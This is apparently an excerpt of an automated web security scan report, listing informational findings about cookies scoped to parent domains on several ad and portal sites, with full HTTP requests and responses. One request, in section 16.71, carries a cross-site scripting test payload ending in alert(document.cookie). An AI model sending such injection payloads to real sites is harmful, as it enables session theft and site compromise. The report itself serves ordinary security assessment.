GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.551781514659524 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=2:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=372
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:16:32 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzCus
...[SNIP]...

16.69. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

16.70. http://deals.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deals.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

16.71. http://dg.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dg.specificclick.net
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight2d710%2522%253balert(document.cookie)%2F%2F68483822cd8&r=http%3A%2F%2Fburp%2Fshow%2F21 HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adp=79jE^0^4095; smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=79jE^0^0; ug=uosDj9Liw_xRTA

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate
Cache-Control: post-check=0,pre-check=0
Pragma: no-cache
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: adp=79jE^0^4095; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: smdmp=780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
Set-Cookie: adf=79jE^0^0; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Mon, 30-Jan-2012 01:37:56 GMT; Path=/
p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA"
Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:37:55 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 0

16.72. http://editorial.autos.redacted/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=809818d765004928b3863b73ae1a7281; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1E98BFEFC7AD4A61B8576A26797B1A16; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /article.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.73. http://editorial.autos.redacted/articles/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/articles/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=69ea214e2db949c1adb4b09535432079; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=768421AB2A474F75A2A0356E76F9A868; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 39091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.74. http://editorial.autos.redacted/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2055ff4949f4938b5733da1ed24544e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=30C61D772A2040BEA40CE77407721D63; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.75. http://editorial.autos.redacted/media/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/media/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=7f39811ff05647408c8faea3cdd2f40e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=7A4C72BC26CB4E3EB7E637ACF81B2D78; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.76. http://editorial.autos.redacted/media/video/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/media/video/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/video/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:06 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1b6d9a1169d84117806825e1245e514d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=282B2494452D4EF08780001B5E10E010; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:06 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...

16.77. http://editorial.autos.redacted/new-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/new-cars/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /new-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ff89ea3264c14793bcb0990ab84276b0; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F28B3EDBC5D6441D845D4C4460CEA484; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.78. http://editorial.autos.redacted/slideshow.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/slideshow.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=7b4a758c71c84b67bd5ca4184af69515; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=EE184531720E4743A15DC3BBC4F0985E; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /slideshow.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.79. http://editorial.autos.redacted/used-cars/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.redacted
Path:	/used-cars/default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /used-cars/default.aspx HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0f2992fc55e64374a8de46d105ca4355; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8E803F046F9B48FC80C03D86EE3DD45F; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:04 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

16.80. http://entertainment.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=77a66bfe41db42d28e4f88077be1798b; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.81. http://entertainment.redacted/news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/news/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=995146dbfad74c20970e903f13e0f1ce; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.82. http://entertainment.redacted/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://entertainment.msn.com
Path:	/video/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=67f07d4e22dd45d1976d2b39e3c3771d; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/ HTTP/1.1
Host: entertainment.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.83. http://expression.microsoft.com/en-us/cc136530.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://expression.microsoft.com
Path:	/en-us/cc136530.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
ADS=SN=175A21EF; domain=.microsoft.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/cc136530.aspx HTTP/1.1
Host: expression.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAD4BwAAfetuS+xFfAxTn86aknonWg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:41:15 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:41:15 GMT
Content-Length: 66884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link i
...[SNIP]...

16.84. http://health.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://health.redacted
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: health.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:55 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA19
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1133fe74be594c568a34ac6ad24cff7a; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=CE873C51A3AB43DBA17ADCF0FD9904FA; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:55 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36431

